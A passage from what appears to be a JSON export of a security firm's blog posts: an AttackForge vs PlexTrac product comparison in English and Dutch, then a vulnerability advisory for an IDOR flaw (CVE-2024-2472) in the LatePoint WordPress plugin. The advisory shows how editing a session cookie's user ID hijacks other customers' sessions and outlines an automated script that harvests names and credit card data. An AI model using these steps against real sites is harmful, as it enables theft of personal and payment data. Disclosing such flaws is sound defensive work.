PlexTrac.                                                                                         |\n| Collaboration                     | AttackForge offers cross-collaborative features, allowing clients and engineers to work together in real-time.          | PlexTrac also supports real-time team collaboration for effective project management.                                                               |\n| Pricing                           | AttackForge pricing starts at $50/month, offering unlimited projects and client access.                                 | PlexTrac pricing starts at $8000/year, catering to larger budgets.                                                                                   |\n| Red Teaming vs Blue Teaming       | AttackForge supports custom purple-team playbooks with comprehensive custom fields and access controls.                 | PlexTrac supports both red teaming and blue teaming procedures for thorough security assessments.                                                   |\n| Target Audience                   | AttackForge is ideal for individuals, small to medium-sized teams, and large enterprises.                              | PlexTrac is better suited for medium to large enterprises due to its advanced features and pricing.                                                  |\n| Project Management                | AttackForge offers advanced project management tools, including calendars, allocation tracking, custom vulnerability forms, and project scoping. | PlexTrac provides advanced project management tools such as calendars, allocation tracking, and detailed questionnaires.                             |\n| Customer Support                  | AttackForge provides extensive GitHub documentation and strong customer support, including premium support for enterprises. | PlexTrac offers robust customer support with customizable reports to meet user needs.                                                                |\n| Multilingual Support              | AttackForge does not support multi-language reporting out of the box.                                                   | PlexTrac does not offer multi-language reporting by default.                                                                                         |\n| Integrations                      | AttackForge supports imports from over a dozen security tools, enhancing its flexibility.                              | PlexTrac supports imports from over 25 security tools, offering greater integration options.                                                        |\n| APIs                              | AttackForge offers over 100 dedicated (self-service) RESTful APIs and Events-driven APIs for extensive functionality.  | PlexTrac’s API is available for developers to integrate with its data and functionalities based on specific requirements.                             |\n| Custom Fields                     | AttackForge supports various custom field types (Input, Select, Table, Rich-Text, User(s), etc.) with field-level access controls and custom sections. | PlexTrac allows custom fields for different data types, depending on the specific plan.                                                              |\n| Attack Chains                     | AttackForge enables users to build attack chains to demonstrate the execution of TTPs and exploitation procedures.      | PlexTrac offers limited attack path capabilities compared to AttackForge.                                                                            |\n| Asset Management                  | AttackForge includes a dedicated module for comprehensive asset management, covering the entire asset lifecycle.       | PlexTrac offers asset management functionalities within the Clients module, allowing efficient asset tracking and management.                        |\n\n**Choosing Your Champion: AttackForge vs PlexTrac**\n\nNow, here’s where things get even more interesting. Deciding between AttackForge vs PlexTrac depends on your needs.\n\nFor **Startups,** AttackForge offers unbeatable prices, making it a budget-friendly champion for cash-conscious startups. It also provides good features and functionalities for that price.\n\nFor **medium to large companies**, both tools have potential. Consider exploring AttackForge’s higher tiers that are tailored to enterprises and weigh them against PlexTrac’s features.\n\nFor **Automation:** PlexTrac excels in automating report generation and summarizing findings through AI, which AttackForge doesn’t offer yet. However, AttackForge offers greater flexibility for programmatic integrations by providing a robust set of self-service APIs with granular access control. This allows you to grant specific permissions per endpoint/event, ensuring security while enabling automation through service accounts.\n\nFor **Developers:** AttackForge’s active presence on GitHub with open-source code and extensive APIs offers an edge for devs.\n\n## **Frequently Asked Questions for AttackForge vs PlexTrac**\n\n### **Which is better between AttackForge vs PlexTrac?**\n\nThe choice between AttackForge vs PlexTrac depends on individual and team preferences and needs. AttackForge shines for affordability and core functionalities with great customer support, making it a great fit for various team sizes and projects. PlexTrac's power lies in features like AI reporting and robust project management, ideal for larger, collaborative efforts, but at a premium cost.\n\n### **What are other alternatives besides AttackForge vs PlexTrac?**\n\nThere are several other penetration testing management platforms that are alternatives to AttackForge and PlexTrac. Some are Dradis, Sysreport, Ghostwriter, Kroll Cyber Risk, Security Reporter, and Cyver Core.\n\n### **How much does AttackForge cost?**\n\nAttackForge has different pricing tiers based on your team size. Plans start at $50/month and go up to $800/month for large consultancies and SMEs. Large enterprises, government, and Managed Security Services Providers (MSSPs) will need to contact the sales team for a full-featured product with custom pricing.\n\n### **How much does PlexTrac cost?**\n\nPlexTrac’s lowest tier, Essential, starts at $8,000/year.\n\n## **Conclusion**\n\nBoth AttackForge and PlexTrac are valuable tools, but there's no single winner. It all boils down to your specific requirements and budget. At WebSec, we have used AttackForge internally for the last four years, and it shines in terms of affordability, familiarity, and core functionalities. \n\nPlexTrac also offers some advanced features and a collaborative environment, although it comes at a price. Unfortunately, these additional features still don’t justify the difference in price with AttackForge. However, if you have a huge team working on a project simultaneously, PlexTrac could be a valuable consideration.","summary":"Learn the differences and similarities between AttackForge vs PlexTrac for pentesting management and reporting, including alternatives to make an informed choice.","image":"https://firebasestorage.googleapis.com/v0/b/websec-75ef5.appspot.com/o/public%2Fblog%2F605118a0c452ea0751962bdb%2Fa8a16cbf-2141-4999-a3de-2dc6676413c4%2Fthumbnail%20copy.png?alt=media\u0026token=c66f40af-2be8-4eb7-bfb3-175b8722e481","format":"md","published":true,"tags":["attackforge","plextrac","pentest management"],"locale_code":"en","user_id":"605118a0c452ea0751962bdb","dutchArticleId":"66ad0c28ac92a30c342d4151","priority":1722615947238,"User":{"name":"Joel Aviad Ossi","picture":"https://firebasestorage.googleapis.com/v0/b/websec-75ef5.appspot.com/o/public%2Fusers%2F605118a0c452ea0751962bdb%2F8dcfdec2-f192-4322-8589-89d3b2969fc3%2F1660849684285.jpg?alt=media\u0026token=1a29fcec-1b74-4a92-828d-a71770a28755","desc":"Managing Director"},"DutchArticle":{"id":"66ad0c28ac92a30c342d4151","updatedAt":"2024-08-02T16:54:01.588Z","createdAt":"2024-08-02T16:41:12.860Z","title":"AttackForge vs PlexTrac Vergelijking: Verschillen, Overeenkomsten en Alternatieven","body":"![bannerattackforgevsplextracnl.png](https://websec.nl/storage/public%2Fblog%2F605118a0c452ea0751962bdb%2F97e676c8-1760-4866-9cb9-d4b3ba1ebee7%2Fbannerattackforgevsplextracnl.png)\n\n\n# AttackForge vs PlexTrac Vergelijking: Verschillen, Overeenkomsten en Alternatieven\n\nAttackForge en PlexTrac zijn beheer- en rapportageplatforms voor penetratietests. Deze pentest-tools bieden een gecentraliseerd dashboard om beveiligingstests binnen kleine en grote organisaties te vergemakkelijken. Ondanks dat ze hetzelfde doel hebben, zijn er toch verschillen tussen AttackForge en PlexTrac die de keuze voor de ene of de andere kunnen beïnvloeden. In dit artikel vergelijken we de verschillen, overeenkomsten en kenmerken van AttackForge en PlexTrac.\n\nAan het einde kunt u een weloverwogen beslissing nemen over welk platform de beste waarde biedt voor de behoeften van uw team. Laten we meteen beginnen.\n\n## **Wat is AttackForge?**\n\n[AttackForge](https://attackforge.com/) is een budgetvriendelijk pentestbeheer- en rapportageplatform waarmee u pentest-workflows kunt beheren. Het biedt kernservices die de productiviteit, samenwerking en zichtbaarheid verbeteren zonder de bank te breken. Dit omvat het beheren van verschillende fasen van uw penetratietest, zoals:\n\n- Het aanvragen, beoordelen en goedkeuren van een pentest.\n- Het verzamelen van de benodigde toegangseisen.\n- Het registreren van beveiligingskwetsbaarheden en pentest-bevindingen.\n- Het volgen van tests aan de hand van methodologieën en testcases.\n- Geautomatiseerde rapportage voor verschillende belanghebbenden.\n- Het genereren van geautomatiseerde rapporten via zelfgebouwde sjablonen voor rapportage.\n- Het integreren van pentest-bevindingen in systemen van derden.\n- Gestroomlijnde workflows voor herstel en hertesten.\n\nHoewel sommige functies van AttackForge overeenkomen met wat andere pentest-beheerplatforms zoals PlexTrac bieden, blijft AttackForge om vele redenen een industriestandaard.\n\n### **Sterke punten van AttackForge**\n\n- **Kostenbesparend:** AttackForge’s Pro-plan van $50/maand is een goede deal voor een individu, terwijl $150/maand ook kosteneffectief is voor een startup of klein team. Middelgrote adviesbureaus en grote MSSP's moeten respectievelijk $300 en $800 per maand uitgeven, maar dit is nog steeds een relatief goede prijs. Ondernemingen kunnen ook het Enterprise-product aanschaffen, dat een aangepaste prijs heeft op basis van hun behoeften.\n- **Consistentie:** De pentest-processen en de taal van kwetsbaarheden van AttackForge zijn consistent.\n- **Eenvoudig hertesten:** AttackForge vereenvoudigt het proces van het aanvragen en uitvoeren van een hertest, wat u kostbare tijd bespaart.\n- **Geschikt voor kleine tot grote bedrijven:** AttackForge is gebouwd voor bedrijven die jaarlijks tussen de 10 en 10.000 penetratietests uitvoeren.\n- **Documentatie:** AttackForge heeft uitgebreide en gedetailleerde documentatie met een actieve en open GitHub voor bijdragers.\n- **Test Suites:** AttackForge wordt geleverd met Test Suites van industriestandaard methodologieën zoals OWASP, MITRE, NIST, OSSTMM, enz.\n\n### **Zwakke punten van AttackForge**\n\n- **Geen AI-functies:** AttackForge heeft nog geen gebruik gemaakt van AI, wat wat handmatig werk van de gebruikers zou kunnen wegnemen.\n- **Beperkte integratie:** Importen van een handvol beveiligingstools worden ondersteund, maar een bredere dekking zou gunstig zijn.\n- **Meertalige barrière:** AttackForge ondersteunt standaard geen meertalige rapportage.\n\n## **Wat is PlexTrac?**\n\n[PlexTrac](https://plextrac.com/) is een platform voor penetratietests en beheer van kwetsbaarheidsgegevens dat helpt met offensieve beveiligingsrapportage, workflowautomatisering en herstelprioritering.\n\nNet als andere pentest-beheerplatforms zoals AttackForge, helpt PlexTrac u ook bij het beheren van verschillende fasen van uw test.\n\nHet AI-aangedreven platform biedt een gecentraliseerd centrum dat functies combineert zoals:\n\n- **Gestandaardiseerde Runbooks** die vooraf geladen, samengestelde inhoud, testplannen en geïntegreerde procedures van MITRE en Atomic Red Team bevatten.\n- **Integraties** met apps zoals Jira om ervoor te zorgen dat de bestaande projectbeheerprocessen van uw bedrijf worden voortgezet.\n- **Analytics Module** die uw beveiligingshouding visualiseert, kritieke problemen toont die moeten worden aangepakt en helpt u beter te communiceren met niet-technische belanghebbenden.\n- **Bulkacties** zoals het plakken van getroffen assets om snel een lijst met assets direct in de bevinding te uploaden, bulkstatus bewerken, verwijderen of asset bevindingen toewijzen.\n- **CSV-import** om CSV-bevindingen in uw PlexTrac-rapport te importeren met een CSV-parser.\n- **Prioritering** om uw middeleninzet te verbeteren naar de meest kritieke gebieden.\n\nHoewel u sommige van deze functies in andere pentest-beheerplatforms kunt vinden, heeft PlexTrac enkele sterke punten die het een stap boven de meeste anderen maken.\n\n### **Sterke punten van PlexTrac**\n\n- **Geavanceerde editor:** die waarden nauwkeurig in het rapport kan parseren en teksten kan verfijnen, waardoor rapporten meer gepolijst worden.\n- **Granulaire rapportagecontrole:** biedt aangepaste sjablonen om on-demand rapporten te genereren.\n- **Plex AI:** PlexTrac’s AI-aangedreven assistent is geweldig voor het contextualiseren van inhoud, het genereren van uitvoerende samenvattingen binnen het portaal, herstelstappen, het analyseren van grote datasets en het genereren van kwetsbaarheidsbeschrijvingen, wat veel handmatig werk wegneemt. Deze virtuele rapportauteur zou de rapportagetijd van pentests met 70% verkorten, wat enorme tijdsbesparingen oplevert gedurende de hele cyclus.\n- **Projectmanagement powerhouse:** helpt u projecten en middelen te beheren met functies zoals kalenders, toewijzingstracking en een assessments-module om vragenlijsten te maken voor pre-engagement scoping.\n- **Red Teaming vs Blue Teaming:** PlexTrac ondersteunt zowel red teaming als blue teaming procedures.\n- **Bredere dekking van imports:** ondersteunt een grotere verscheidenheid aan beveiligingstools imports.\n- **Realtime samenwerking:** functies maken het een ideaal hulpmiddel voor geografisch verspreide teams.\n\n### **Zwakke punten van PlexTrac**\n\n- **Prijzig:** PlexTrac’s Essential-pakket begint bij een flinke $8000 per jaar, wat het moeilijk maakt voor kleinere teams.\n- **Meertalige barrière:** Momenteel ondersteunt PlexTrac standaard geen meertalige rapportage. Het vereist aparte sjablonen voor elke taal. Gelukkig is AI-aangedreven vertaling in de maak.\n- **Geen directe testsuites/testcases:** PlexTrac heeft geen directe testsuites/testcases, hoewel testplannen beschikbaar zijn.\n\n# **Wat zijn de kernfunctionaliteiten van een penetratietestplatform?**\n\nEr zijn tegenwoordig veel pentest-platforms beschikbaar voor penetratietesters—AttackForge en PlexTrac zijn er slechts twee van. Elk platform biedt onderscheidende functies en functionaliteiten.\n\nVoor de meeste pentesters komt de voorkeur neer op het gereedschap dat ze bijzonder effectief of intuïtief vinden voor hun behoeften. Net zoals een goed passende handschoen perfect aanvoelt, voelt een pentest-tool die aansluit bij uw workflow en stijl onmisbaar aan voor u en uw team.\n\nEchter, het veld van penetratietesten evolueert voortdurend. Nieuwe kwetsbaarheden worden regelmatig ontdekt, wat betekent dat u open moet staan voor het verkennen van nieuwe methodologieën en tools. Bovendien vereist de complexiteit van moderne systemen en applicaties een platform met veel functies om alle aspecten van uw pentests effectief te beheren.\n\nHieronder bespreken we de belangrijkste functionaliteiten die een penetratietest-beheerplatform van waarde moet hebben.\n\n### **Rapportage**\n\nHet is één ding om beveiligingslekken te vinden, maar een uitgebreid en grondig rapport hebben is iets heel anders.\n\nVolgens [CoreSecurity’s Penetration Testing Report](https://www.coresecurity.com/resources/guides/2022-penetration-testing-report) is rapportage de meest gewilde functie in betaalde penetratietestsoftware. Dit is logisch, aangezien veel pentesters en organisaties pentests gebruiken voor naleving. Consistente rapporten zijn niet alleen intern nuttig, maar voldoen ook aan de behoeften van regelgevende auditors.\n\nDaarom, wanneer u een penetratietestplatform kiest, let dan op een platform waarmee u professionele rapporten kunt maken met bevindingen, aanbevelingen en herstelplannen.\n\n### **Kwetsbaarheidsbibliotheek/-beheer**\n\nEen groot aantal organisaties gebruikt pentest-beheerplatforms ter ondersteuning van hun kwetsbaarheidsbeheerprogramma's. Als dat voor u geldt, dan spreekt het voor zich dat dit ook een kernfunctie is om op te letten. Dat wil zeggen, de tool moet de ontdekking, prioritering en hersteltracking van kwetsbaarheden ontdekt tijdens pentests vereenvoudigen.\n\nBovendien biedt het hebben van een kwetsbaarheidsbeheerfunctionaliteit een enkele bron van waarheid voor alle geïdentificeerde kwetsbaarheden en stelt het u in staat een uitgebreide risicoanalyse te maken op basis van deze kwetsbaarheden.\n\nDoor deze functie aan te bieden, wordt een goed pentest-beheerplatform het centrum voor het identificeren van beveiligingsproblemen en het beheren van het proces om deze te verhelpen gedurende de hele pentest-levenscyclus.\n\n### **Projectmanagement**\n\nU wilt altijd een pentest-platform met betrouwbare projectmanagementfunctionaliteit. Hiermee kan uw team pentests georganiseerd en efficiënt uitvoeren. Wat projectmanagement hier inhoudt, is een tool die het volgende kan doen:\n\n- **Afbakening:** de grenzen en scope van de pentest definiëren, zoals de intensiteit van de test (black box, white box, grey box) en de systemen, applicaties of gegevens die getest moeten worden.\n- **Planning:** deadlines plannen en toewijzen voor verschillende fasen van de pentest om aan de vastgestelde tijdlijnen te voldoen.\n- **Middelen toewijzen:** optimalisatie van het gebruik van middelen door pentesters specifieke taken toe te wijzen op basis van hun expertise en werklast.\n- **Taaktracking:** voortgang volgen om mogelijke vertragingen te identificeren en afhankelijkheden te beheren.\n\nUiteindelijk heeft u een tool nodig die uitgebreide toegang biedt tot informatie over het hele pentestproces.\n\n### **Samenwerking**\n\nHet is ook belangrijk om een tool te hebben die veilige communicatiekanalen biedt tussen pentesters en belanghebbenden. Dit omvat commentaarfunctionaliteit, versiebeheer, taaktoewijzing en -tracking, enz.\n\nOmdat pentesten vaak een gezamenlijke inspanning zijn, hebt u een tool nodig die dat proces kan faciliteren en de transparantie kan verbeteren.\n\n### **Integraties van derden**\n\nEen andere kernfunctionaliteit van een penetratietestplatform is de mogelijkheid om verbinding te maken met en te communiceren met andere beveiligingstools. Dit maakt uw workflow gestroomlijnd en geautomatiseerd. Integraties kunnen plaatsvinden tussen het pentest-platform en bug bounty-platforms, SIEM-systemen, externe kwetsbaarheidsscanners en ontwikkeltools zoals code-repositories.\n\nUiteindelijk vermindert een tool die dit kan doen de handmatige werklast, zoals gegevensinvoer, en biedt het betere zichtbaarheid.\n\n### **Compatibiliteit**\n\nDe meeste penetratietestsoftware is compatibel met Linux OS. Sommige daarvan zijn vooraf geïnstalleerd op het OS. Pentest-tools moeten echter ook kwetsbaarheden kunnen vinden op andere apparaten zoals die met macOS, Windows OS en Android-smartphones. Dit maakt het belangrijk om pentest-software te vinden die compatibel is met meerdere apparaten.\n\nAndere functies zoals snelle reactietijd en levertijd, evenals compliance management functies zoals meertalige rapportage, kunnen ook van onschatbare waarde zijn.\n\n## **Vergelijking AttackForge vs PlexTrac**\n\n# Vergelijkingstabel\n\n| Kenmerk                           | AttackForge                                                                                                              | PlexTrac                                                                                                                                             |\n| :-------------------------------- | :----------------------------------------------------------------------------------------------------------------------- | :--------------------------------------------------------------------------------------------------------------------------------------------------- |\n| Rapportage-aanpassing             | AttackForge biedt robuuste rapportagemotoren (ReportGen) voor het maken van zeer aanpasbare sjablonen.                    | PlexTrac biedt granulaire controle met aanpasbare sjablonen voor gedetailleerde rapportage.                                                           |\n| Testsuites/Testcases              | Vooraf geladen met testsuites van OWASP, MITRE, OSSTMM en NIST, zorgt AttackForge voor uitgebreide testdekking.          | PlexTrac biedt geen directe testsuites of testcases, maar bevat gedetailleerde testplannen voor gestructureerde beoordelingen.                        |\n| Gebruikerservaring                | AttackForge heeft een professionele en gedetailleerde gebruikersinterface (UI) voor een verbeterde gebruikerservaring.    | PlexTrac’s minimalistische thema lijkt mogelijk niet professioneel voor sommige gebruikers, wat de gebruikerservaring kan beïnvloeden.               |\n| AI                                | AI-ondersteuning is niet beschikbaar in AttackForge.                                                                    | PlexTrac bevat AI-ondersteuning met PlexAI, beschikbaar zonder extra kosten voor Premium-gebruikers. Essential en Core-gebruikers kunnen deze functie toevoegen of een gratis proefperiode krijgen. |\n| Integratie Secure Code Training   | AttackForge integreert Secure Code Training met SecDim, wat veilige codering bevordert.                                 | Integratie van Secure Code Training is niet beschikbaar in PlexTrac.                                                                                 |\n| Samenwerking                      | AttackForge biedt cross-collaboratieve functies, waardoor klanten en engineers in realtime kunnen samenwerken.           | PlexTrac ondersteunt ook realtime samenwerking in teams voor effectief projectbeheer.                                                                 |\n| Prijzen                           | De prijzen van AttackForge beginnen bij $50/maand, met onbeperkte projecten en toegang voor klanten.                    | De prijzen van PlexTrac beginnen bij $8000/jaar, wat geschikt is voor grotere budgetten.                                                              |\n| Red Teaming vs Blue Teaming       | AttackForge ondersteunt aangepaste purple-team playbooks met uitgebreide aangepaste velden en toegangscontrole.          | PlexTrac ondersteunt zowel red teaming als blue teaming procedures voor grondige beveiligingsbeoordelingen.                                           |\n| Doelgroep                         | AttackForge is ideaal voor individuen, kleine tot middelgrote teams en grote ondernemingen.                              | PlexTrac is beter geschikt voor middelgrote tot grote ondernemingen vanwege de geavanceerde functies en prijzen.                                       |\n| Projectmanagement                 | AttackForge biedt geavanceerde projectmanagementtools, waaronder kalenders, toewijzingstracking, aangepaste kwetsbaarheidsformulieren en projectafbakening. | PlexTrac biedt geavanceerde projectmanagementtools zoals kalenders, toewijzingstracking en gedetailleerde vragenlijsten.                               |\n| Klantenservice                    | AttackForge biedt uitgebreide GitHub-documentatie en sterke klantenondersteuning, inclusief premium ondersteuning voor ondernemingen. | PlexTrac biedt robuuste klantenservice met aanpasbare rapporten om aan de behoeften van gebruikers te voldoen.                                         |\n| Meertalige ondersteuning          | AttackForge ondersteunt standaard geen meertalige rapportage.                                                             | PlexTrac biedt standaard geen meertalige rapportage.                                                                                                  |\n| Integraties                       | AttackForge ondersteunt importen van meer dan een dozijn beveiligingstools, wat de flexibiliteit vergroot.               | PlexTrac ondersteunt importen van meer dan 25 beveiligingstools, wat meer integratieopties biedt.                                                     |\n| APIs                              | AttackForge biedt meer dan 100 toegewijde (self-service) RESTful API's en gebeurtenisgestuurde API's voor uitgebreide functionaliteit. | De API van PlexTrac is beschikbaar voor ontwikkelaars om te integreren met de gegevens en functionaliteiten op basis van specifieke vereisten.         |\n| Aangepaste velden                 | AttackForge ondersteunt verschillende typen aangepaste velden (Invoer, Selectie, Tabel, Rijke Tekst, Gebruiker(s), enz.) met veldniveau-toegangscontrole en aangepaste secties. | PlexTrac staat aangepaste velden toe voor verschillende gegevenssoorten, afhankelijk van het specifieke plan.                                          |\n| Aanvalsketens                     | AttackForge stelt gebruikers in staat aanvalsketens te bouwen om de uitvoering van TTP's en exploitatieprocedures te demonstreren. | PlexTrac biedt beperkte aanvalspadcapaciteiten in vergelijking met AttackForge.                                                                        |\n| Assetbeheer                       | AttackForge bevat een speciaal module voor uitgebreid assetbeheer, waarbij de gehele levenscyclus van assets wordt gedekt. | PlexTrac biedt assetbeheerfunctionaliteiten binnen de Clients-module, waardoor efficiënt assettracking en -beheer mogelijk is.                         |\n\n**Uw Kampioen Kiezen: AttackForge vs PlexTrac**\n\nNu wordt het pas echt interessant. De keuze tussen AttackForge en PlexTrac hangt af van uw behoeften.\n\nVoor **startups** biedt AttackForge onverslaanbare prijzen, wat het een budgetvriendelijke kampioen maakt voor kostenbewuste startups. Het biedt ook goede functies en functionaliteiten voor die prijs.\n\nVoor **middelgrote tot grote bedrijven** hebben beide tools potentieel. Overweeg AttackForge’s hogere niveaus die zijn afgestemd op ondernemingen en vergelijk deze met de functies van PlexTrac.\n\nVoor **automatisering** blinkt PlexTrac uit in het automatiseren van rapportgeneratie en het samenvatten van bevindingen via AI, wat AttackForge nog niet biedt. Echter, AttackForge biedt meer flexibiliteit voor programmatische integraties door een robuuste set self-service API's met gedetailleerde toegangscontrole te bieden. Hiermee kunt u specifieke permissies per eindpunt/gebeurtenis toewijzen, wat de beveiliging waarborgt en automatisering via serviceaccounts mogelijk maakt.\n\nVoor **ontwikkelaars** biedt AttackForge's actieve aanwezigheid op GitHub met open-source code en uitgebreide API's een voorsprong voor ontwikkelaars.\n\n## **Veelgestelde Vragen over AttackForge vs PlexTrac**\n\n### **Welke is beter, AttackForge of PlexTrac?**\n\nDe keuze tussen AttackForge en PlexTrac hangt af van individuele en teamvoorkeuren en -behoeften. AttackForge blinkt uit in betaalbaarheid en kernfunctionaliteiten met uitstekende klantenondersteuning, waardoor het een geweldige keuze is voor verschillende teamgroottes en projecten. PlexTrac's kracht ligt in functies zoals AI-rapportage en robuust projectbeheer, ideaal voor grotere, collaboratieve inspanningen, maar tegen een hogere prijs.\n\n### **Wat zijn andere alternatieven naast AttackForge en PlexTrac?**\n\nEr zijn verschillende andere penetratietestbeheerplatforms die alternatieven zijn voor AttackForge en PlexTrac. Enkele zijn Dradis, Sysreport, Ghostwriter, Kroll Cyber Risk, Security Reporter en Cyver Core.\n\n### **Hoeveel kost AttackForge?**\n\nAttackForge heeft verschillende prijsklassen op basis van de grootte van uw team. Plannen beginnen bij $50/maand en gaan tot $800/maand voor grote adviesbureaus en MKB. Grote ondernemingen, overheid en Managed Security Services Providers (MSSP's) moeten contact opnemen met het verkoopteam voor een volledig uitgeruste product met aangepaste prijzen.\n\n### **Hoeveel kost PlexTrac?**\n\nPlexTrac’s laagste niveau, Essential, begint bij $8,000/jaar.\n\n## **Conclusie**\n\nZowel AttackForge als PlexTrac zijn waardevolle tools, maar er is geen duidelijke winnaar. Het komt allemaal neer op uw specifieke vereisten en budget. Bij WebSec gebruiken we AttackForge intern al vier jaar, en het blinkt uit in termen van betaalbaarheid, vertrouwdheid en kernfunctionaliteiten.\n\nPlexTrac biedt ook enkele geavanceerde functies en een samenwerkingsgerichte omgeving, hoewel het tegen een hogere prijs komt. Helaas rechtvaardigen deze extra functies nog steeds niet het prijsverschil met AttackForge. Echter, als u een groot team hebt dat gelijktijdig aan een project werkt, kan PlexTrac een waardevolle overweging zijn.","summary":"Leer de verschillen en overeenkomsten tussen AttackForge en PlexTrac voor pentestbeheer en rapportage, inclusief alternatieven, om een weloverwogen keuze te maken.","image":"https://firebasestorage.googleapis.com/v0/b/websec-75ef5.appspot.com/o/public%2Fblog%2F605118a0c452ea0751962bdb%2F6fbbf716-42b1-482c-a86e-e0184dd7db7c%2Fthumbnail%20copy.png?alt=media\u0026token=fbc3747c-c6c0-42d6-a81e-123483f30077","format":"md","published":true,"tags":["attackforge","plextrac","pentest management"],"locale_code":"nl","user_id":"605118a0c452ea0751962bdb","dutchArticleId":null,"priority":1722616872859,"User":{"name":"Joel Aviad Ossi","picture":"https://firebasestorage.googleapis.com/v0/b/websec-75ef5.appspot.com/o/public%2Fusers%2F605118a0c452ea0751962bdb%2F8dcfdec2-f192-4322-8589-89d3b2969fc3%2F1660849684285.jpg?alt=media\u0026token=1a29fcec-1b74-4a92-828d-a71770a28755","desc":"Managing Director"}}},{"id":"666b78446e63d6dcdb0f73bf","updatedAt":"2024-07-02T10:25:55.444Z","createdAt":"2024-06-13T22:52:52.011Z","title":"Critical IDOR Vulnerability in LatePoint Plugin Exposes Sensitive Data","body":"![CVE-2024-2472.png](https://firebasestorage.googleapis.com/v0/b/websec-75ef5.appspot.com/o/public%2Fblog%2F605118a0c452ea0751962bdb%2F40bffbe0-ff52-4892-bad3-b49880bab4b9%2Fcve-2024-2472.png?alt=media\u0026token=af944680-ba7a-4ee8-b621-9dc2db002189)\n\n\n## Introduction\n\nIn a recent security research, a critical vulnerability has been identified in the LatePoint plugin for WordPress, affecting versions up to and including 4.9.9. This vulnerability, categorized under **CVE-2024-2472**, has been rated with a CVSS score of **9.1 (Critical)** due to its severe implications for unauthorized data access and modification. The vulnerability arises from a missing capability check in the `start_or_use_session_for_customer` function, which exposes sensitive information and allows unauthorized actions by attackers. The flaw was discovered by security researchers **Gharib Sharifi**  and **Joel Aviad Ossi**, highlighting the potential risks associated with this plugin.\n\n## Vulnerability Description\n\nThe LatePoint plugin for WordPress facilitates appointment booking and management. The identified vulnerability is an Insecure Direct Object Reference (IDOR) caused by improper handling of session cookies. Upon booking a service, such as a haircut appointment, the plugin assigns a session cookie to the user. This cookie includes a numeric value that directly correlates to the user's session and their personal information.\n\nThe critical issue lies in the modifiable nature of this cookie value. An attacker can manipulate the numeric portion of the cookie (e.g., changing `6606` to `6605`) to gain unauthorized access to other users' sessions. This can lead to the exposure of sensitive personal information, including names, last names, dates of birth, and phone numbers. Additionally, if the website allows appointment management, the attacker could alter, cancel, or create appointments under another user's identity.\n\n## Proof of Concept\n\nTo demonstrate the vulnerability, consider the following proof of concept:\n\n1. **User Session Initialization**: A user visits a website using the LatePoint plugin and books a service, receiving a session cookie. For instance, a customer named John Doe books an appointment and gets a cookie with the following value:\n\n```\nUserID||Timestamp||Hash\n```\n\nExample value before modification:\n```\n5%7C%7C1703097251%7C%7C7c8c3c2ca3e8f499583a474cd292c0767eb4559ae159e5477b8e7340b2eb8295\n```\n\n2. **Cookie Manipulation**: An attacker intercepts and modifies the UserID portion of the cookie value to switch to a different user session. For example, changing `5` to `1`:\n\n```\n1%7C%7C1703097251%7C%7C7c8c3c2ca3e8f499583a474cd292c0767eb4559ae159e5477b8e7340b2eb8295\n```\n\n3. **Unauthorized Access**: The attacker refreshes the page, gaining access to the previous data input and appointment management functionalities of the altered user session. This unauthorized access can reveal personal information and allow the attacker to manipulate appointments.\n\n## Detailed Research and Impact\n\nThe vulnerability was first discovered by Gharib Sharifi and further developed into a full proof-of-concept by Joel Aviad Ossi. Their research demonstrated the potential impact on sensitive payment information (PII), including the exfiltration of credit card details. This collaboration highlighted the severe consequences of this vulnerability, resulting in a critical impact score of 9.1 by Wordfence.\n\n### Exploit Explanation\n\nTo protect against potential misuse, the exploit script used to demonstrate this vulnerability is not included in this blog. However, the script automates the process of exploiting the IDOR vulnerability to extract sensitive information from the LatePoint plugin. Here is an explanation of its functionality:\n\n1. **Initialization and Setup**: The script sets up a session and prompts the user to enter the target website.\n\n2. **Cookie Handling**: The script sends a request to the target website to obtain the original session cookie. It then modifies the UserID portion of the cookie to iterate through different user sessions.\n\n3. **Concurrent Execution**: Using a thread pool, the script concurrently processes multiple user IDs to speed up the exploitation process.\n\n4. **Data Extraction**: For each modified session, the script sends requests to extract sensitive information, including names, email addresses, credit card numbers, expiration dates, and security codes. The extracted data is then saved to a file.\n\nThis explanation highlights how an attacker could potentially dump entire databases of sensitive information, including credit card details, by exploiting the vulnerability in the LatePoint plugin.\n\n## Remediation\n\nThe vulnerability has been patched in version 4.9.9.1 of the LatePoint plugin. Users are strongly advised to update to this version or newer patched versions to mitigate the risk of unauthorized access and data exposure.\n\n- **Patched Version**: 4.9.9.1\n- **Affected Versions**: \u003c= 4.9.9\n\n## Exceptions\n\nThe exploit did not work for plugin users when the setting \"Use WordPress users as customers\" was set to **OFF**\n\n## Conclusion\n\nThe discovery and mitigation of the IDOR vulnerability in the LatePoint plugin underscore the critical need for rigorous security checks in software development. This case serves as a reminder of the potential risks associated with insecure session management and the importance of implementing proper capability checks to protect sensitive information. Users of the LatePoint plugin should promptly update to the latest version to safeguard their data and maintain secure operations.\n\nFor further details and technical insights, refer to the published reports by the discoverers and the Wordfence Intelligence user interface.\n\n## CVSS Risk Table\n\n![RiskTable.jpg](https://firebasestorage.googleapis.com/v0/b/websec-75ef5.appspot.com/o/public%2Fblog%2F605118a0c452ea0751962bdb%2F742af55e-9bf6-44d9-aa51-03e0bd9d11e8%2Frisktable.jpg?alt=media\u0026token=b72fbff1-1a76-4405-ac49-24ef33710972)\n\n## References\n\n- [wpdocs.latepoint.com](https://wpdocs.latepoint.com)\n- [wordfence](https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/LatePoint/latepoint-plugin-499-missing-authorization-and-sensitive-information-exposure-via-idor)","summary":"The LatePoint Plugin plugin for WordPress was vulnerable to unauthorized access of data through Insecure Direct Object Reference, allowing for the exposure of customer payment data such as creditcards","image":"https://firebasestorage.googleapis.com/v0/b/websec-75ef5.appspot.com/o/public%2Fblog%2F605118a0c452ea0751962bdb%2F661863c7-70d4-4980-9196-fb7fcb5e036c%2FDALL%C2%B7E%202024-06-14%2000.52.28%20-%20A%20hacker%20wearing%20a%20hoodie%2C%20sitting%20in%20front%20of%20multiple%20computer%20screens%20in%20a%20dimly%20lit%20room.%20The%20hacker's%20face%20is%20obscured%20by%20shadows.%20In%20the%20center%20.webp?alt=media\u0026token=d46808f3-8d3d-4968-bd01-a969ac15bb12","format":"md","published":true,"tags":["CVE-2024-2472","Gharib Sharifi","exploitation"],"locale_code":"en","user_id":"605118a0c452ea0751962bdb","dutchArticleId":"666b83986e63d6dcdb0f73c0","priority":1718319172011,"User":{"name":"Joel Aviad 